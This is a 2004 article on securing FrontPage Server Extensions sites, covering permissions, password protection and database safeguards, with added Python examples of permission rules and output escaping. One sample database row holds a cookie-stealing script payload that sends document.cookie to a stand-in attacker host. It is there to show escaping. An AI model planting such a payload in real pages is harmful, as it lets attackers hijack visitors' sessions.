Web Server Security Issues and FrontPage Server Extensions

by Deb Shinder [Published on 14 Dec. 2004 / Last Updated on 14 Dec. 2004]

It's "common knowledge" (at least in some circles) that FrontPage Server Extensions are insecure and that Web sites created with FrontPage are vulnerable -- but is it true? What are the actual risks associated with FrontPage, and what can you do about them? What are the recommended best practices for securing FrontPage Web sites? In this article, we'll look at Web security from the FrontPage perspective.

Regardless of the software you're using, public Web servers are exposed simply because they must be reachable from the Internet: anyone outside the organization can send requests to the computer that hosts the Web server software. For this reason, it's especially important to harden your public Web servers and isolate them from other systems on your internal network, for example by placing them in a DMZ or perimeter network (also sometimes called a screened subnet) with a front-end firewall between the Internet and the DMZ and a back-end firewall between the DMZ and the internal LAN, so that a compromised Web server cannot be used as a direct stepping stone into the internal network.

The FrontPage Server Extensions

FrontPage Server Extensions (FPSE) can run on both UNIX-based and Windows (IIS) Web servers, and the security issues differ somewhat depending on the underlying operating system and Web server software. The purpose of FPSE is to let Webmasters create Web pages and manage Web sites through the FrontPage interface, which is more user friendly than uploading, removing and changing Web files via File Transfer Protocol (FTP). The extensions themselves are server-side programs that the FrontPage client talks to over HTTP, so they are reachable by anyone who can reach the Web server. Microsoft calls a Web server running FPSE an extended Web server.

The latest version of FrontPage is 2003, but the latest version of FPSE is 2002. FrontPage 2003 works with the 2002 server extensions, which are included with Windows Server 2003. Windows SharePoint Services also provides the functionality of FPSE. You can download FPSE 2002 for Windows at http://www.microsoft.com/downloads/details.aspx?FamilyID=5cc0a845-1884-4a16-a8cb-25d2f0815fa3&displaylang=en. They can be installed on Windows NT 4.0 (with SP6a), Windows 2000 and Windows XP with IIS.

You can download FPSE 2002 for UNIX at http://www.microsoft.com/downloads/details.aspx?FamilyID=0c5eb0ad-e1ad-4100-9b76-8772a8220062&displaylang=en. They will run on Solaris, HP-UX, Linux (Red Hat), FreeBSD and other versions of UNIX.

FPSE 2002 is required for the following:

  • to upload files to the Web site via FrontPage
  • to create custom link bars, use shared border background properties and other FrontPage components
  • to get usage analysis reports
  • to take advantage of user roles for security

Some version of FPSE (not necessarily 2002) is required to create hit counters, server-side image maps, search forms and other components that you insert with FrontPage, because those components are processed on the server when a visitor requests the page.

What are the Security Issues?

It is important that only authorized users be able to add, change or delete Web content. On an extended Web server this means controlling who can author and administer the site through FPSE, not just who can log on to the server itself. Some components, such as Java applets and scripts, execute code and can present security risks.

Another security risk arises when Web users connect to a database through the Web server to access information: the account used for the connection, the error messages the database returns and the data it displays can each be turned against you.

In the following section, we'll discuss what you can do to protect your FrontPage Web sites from these risks.

Protecting FrontPage Web Sites

There are a number of steps you can take to protect your FrontPage Web sites.

You can restrict access to the Web sites you create with FrontPage by configuring permissions. There are three levels of access to a site: end users who only view pages (browsers), those who can create content (authors) and those who can manage the site (administrators). You can set individual permissions for different sites, and you can set different permissions for subsites within a site (by default, subsites inherit the permissions of their parent sites).

To set permissions for a subsite from within FrontPage 2003, do the following after opening the subsite:

  1. Click Tools | Server | Permissions
  2. On the Settings tab, select Use unique permissions for this Web site.
  3. Click Apply.
  4. Click the Groups, Users or Computers tab to set access rights for a group, user or computer. In the appropriate tab, click the Add button to add a new group, user or computer, or click the Edit button to change the access rights for a group, user or computer that is already listed.

To set permissions for a particular computer, you'll need to enter its IP address. You can also set permissions for a group of computers within an address range by using the wildcard (*) in place of an octet; for example, 162.198.1.* covers every address from 162.198.1.0 through 162.198.1.255. Bear in mind that an address-based grant trusts everyone who can send requests from that range, including all users behind a shared proxy or NAT device. For the group(s), user(s) or computer(s), you can select to allow browsing of the Web, authoring and browsing, or administering, authoring and browsing.

Note:
Permissions are cumulative. A group, user or computer with administrative rights can also author and browse; one with author rights can also browse.
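The permission rules described above (cumulative levels, subsite inheritance versus unique permissions, and computer grants with an octet wildcard) are easy to get wrong when reasoning about who can author a site. The following Python model is an added illustration, not FPSE's own code or its on-disk permission format; the class, method and account names are invented for the example, and the three sample sites are constructed here.

```python
"""
A small model of the FPSE permission rules described above: three cumulative
access levels (browse < author < administer), subsites that inherit their
parent's permissions unless "Use unique permissions" is set, and grants to
users, groups or computers, where a computer pattern may use * for an octet
(162.198.1.*). This is an added illustration, not FPSE's own code or its
on-disk ACL format; the class and method names are invented for the example.
"""
from dataclasses import dataclass, field
from enum import IntEnum
from typing import Dict, Optional


class Level(IntEnum):
    NONE = 0
    BROWSE = 1
    AUTHOR = 2       # authors can also browse
    ADMINISTER = 3   # administrators can also author and browse


def ip_matches(pattern: str, address: str) -> bool:
    """True if a dotted-quad address matches an FPSE-style pattern.

    '*' stands for one whole octet; anything that is not four fields fails,
    so '162.198.1.*' does not match '162.198.1' or '162.198.1.5.6'.
    """
    pat, addr = pattern.split("."), address.split(".")
    if len(pat) != 4 or len(addr) != 4:
        return False
    return all(p == "*" or p == a for p, a in zip(pat, addr))


@dataclass
class Site:
    name: str
    parent: Optional["Site"] = None
    unique: bool = False  # "Use unique permissions for this Web site"
    users: Dict[str, Level] = field(default_factory=dict)
    groups: Dict[str, Level] = field(default_factory=dict)
    computers: Dict[str, Level] = field(default_factory=dict)  # pattern -> level

    def effective(self) -> "Site":
        """Walk up until we reach a site whose own permission set applies."""
        site = self
        while site.parent is not None and not site.unique:
            site = site.parent
        return site

    def level_for(self, kind: str, principal: str) -> Level:
        """Highest level granted to one user, group or computer address."""
        site = self.effective()
        if kind == "computer":
            matches = [lvl for pat, lvl in site.computers.items() if ip_matches(pat, principal)]
            return max(matches, default=Level.NONE)
        table = site.users if kind == "user" else site.groups
        return table.get(principal, Level.NONE)

    def can(self, action: str, kind: str, principal: str) -> bool:
        """Cumulative check: an administrator may author and browse, an author may browse."""
        needed = {"browse": Level.BROWSE, "author": Level.AUTHOR, "administer": Level.ADMINISTER}[action]
        return self.level_for(kind, principal) >= needed


def build_demo() -> Dict[str, Site]:
    """Constructed sample: a root site, one inheriting subsite, one with unique permissions."""
    root = Site("root")
    root.users["webmaster"] = Level.ADMINISTER
    root.groups["Authors"] = Level.AUTHOR
    root.computers["*.*.*.*"] = Level.BROWSE        # anyone may browse
    root.computers["162.198.1.*"] = Level.AUTHOR    # one office subnet may author
    docs = Site("docs", parent=root)                # inherits root's permissions
    hr = Site("hr", parent=root, unique=True)       # unique permissions, nothing inherited
    hr.users["hr_admin"] = Level.ADMINISTER
    return {"root": root, "docs": docs, "hr": hr}


if __name__ == "__main__":
    sites = build_demo()
    print(sites["docs"].can("author", "group", "Authors"))           # True, inherited from root
    print(sites["hr"].can("browse", "user", "webmaster"))            # False, unique permissions
    print(sites["root"].can("author", "computer", "162.198.1.40"))   # True, wildcard grant
    print(sites["root"].can("author", "computer", "162.198.2.40"))   # False, browse only
```

The point of the model is the last two checks: once a subsite is switched to unique permissions, nothing from the parent applies any more (not even the root administrator), and a wildcard computer grant applies to every host in that range, whoever is sitting at it.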

You can also restrict access to individual Web pages by password protecting them. For information on how to use Active Server Pages (ASP) and an Access password database to password protect FrontPage 2003 Web sites, see KB article 825498 at http://support.microsoft.com/default.aspx?scid=kb;en-us;825498.

If you have a Web site on a UNIX server, you can use the Registration Form Handler to create registration forms and configure user permissions. For more information on how to use this feature to create a registration Web, see KB article 143092 at http://support.microsoft.com/kb/q143092/.

Note:
Registration Web pages are not supported by IIS.

A site author can turn off support for Active Server Pages (ASP) or for features that require FPSE from within FrontPage. This is done via Tools | Page Options. On the Authoring tab, you can check or uncheck the technologies that you want the site to support, including:

  • SharePoint Services
  • Browse-time Web components
  • Author-time Web components
  • ActiveX controls
  • VBScript
  • JavaScript/JScript
  • Java applets
  • Frames
  • ASP
  • Cascading Style Sheets (CSS)
  • PNG graphics

Note that this is an authoring-side setting: unchecking a technology stops FrontPage from offering it when you build pages, so that you don't rely on something the target server doesn't support. It does not disable the technology on the server or remove it from pages that already use it; for that, you still have to configure the Web server itself.

FrontPage 2003 includes the Database Interface Wizard and the Database Results Wizard, which let you configure options that reduce the risk when users connect to a database through the Web server. The defaults are also chosen for better security; for example, database error information is not displayed by default, because error messages can reveal table and column names and other details that help an attacker learn about the database. Another measure is to set up a dedicated account, with only the database permissions the page needs, for the Web page that connects to the database, and to give it a user name and password that are different from those used for other resources, so that a compromise of the Web site does not hand over credentials for anything else. If the database contains built-in macros, you should disable them. You also should not allow HTML content from database columns to be rendered in the page: column values should be displayed as text, because otherwise anyone who can write to the database (for example, through a form) can place script in the pages every visitor sees.
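Two of the safeguards just discussed, suppressing database error details and displaying column values as text rather than HTML, are shown below in working Python. This is an added example and not FrontPage's generated ASP: an in-memory SQLite table stands in for the Access database (an assumption of the example), and the sample guestbook rows, including one that carries submitted script, are constructed here.

```python
"""
Two safeguards from the database discussion above, shown in working Python:
the generated page must not echo database error details to the browser, and
column values must be rendered as text, not as HTML. This is an added
illustration, not FrontPage's generated ASP; an in-memory SQLite table stands
in for the Access database (an assumption of the example) and the sample rows
are constructed here.
"""
import html
import sqlite3

GENERIC_ERROR = "<p>The database query could not be completed.</p>"


def open_sample_db() -> sqlite3.Connection:
    """Constructed sample table; row 2 carries HTML that a visitor submitted."""
    cn = sqlite3.connect(":memory:")
    cn.execute("CREATE TABLE guestbook (id INTEGER, name TEXT, comment TEXT)")
    cn.executemany("INSERT INTO guestbook VALUES (?, ?, ?)", [
        (1, "Alice", "Nice site & useful tips"),
        (2, "Mallory", "<script>document.location='http://evil.example/?'+document.cookie</script>"),
    ])
    return cn


def render_results(cn: sqlite3.Connection, sql: str, params=(), show_errors: bool = False) -> str:
    """Run a parameterised query and render the rows as an HTML table.

    show_errors mirrors the wizard's option to display database errors; it is
    off by default, so schema details in the exception never reach the browser.
    """
    try:
        cur = cn.execute(sql, params)
        columns = [d[0] for d in cur.description]
        rows = cur.fetchall()
    except sqlite3.Error as exc:
        if show_errors:
            return "<p>Database error: " + html.escape(str(exc)) + "</p>"
        return GENERIC_ERROR

    parts = ["<table>"]
    parts.append("<tr>" + "".join("<th>%s</th>" % html.escape(c) for c in columns) + "</tr>")
    for row in rows:
        # escape every cell: stored HTML is shown literally instead of executing
        parts.append("<tr>" + "".join("<td>%s</td>" % html.escape(str(v)) for v in row) + "</tr>")
    parts.append("</table>")
    return "\n".join(parts)


if __name__ == "__main__":
    db = open_sample_db()
    print(render_results(db, "SELECT name, comment FROM guestbook ORDER BY id"))
    print(render_results(db, "SELECT * FROM no_such_table"))                    # generic message
    print(render_results(db, "SELECT * FROM no_such_table", show_errors=True))  # leaks the table name
```

Run it and compare the last two lines of output: with error display on, the message names the missing table, which is exactly the kind of schema detail the wizard's default keeps away from visitors. The escaped guestbook row shows Mallory's script as harmless text.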

Summary

FrontPage and FrontPage Server Extensions contain a number of features that allow you to make your Web sites more secure. The trick is in knowing about them and using them. In this article, we’ve discussed some of the ways you can better secure your Web sites created with FrontPage that use the FrontPage Server Extensions.

The Author — Deb Shinder


Debra Littlejohn Shinder, MCSE, MVP (Security) is a technology consultant, trainer and writer who has authored a number of books on computer operating systems, networking, and security.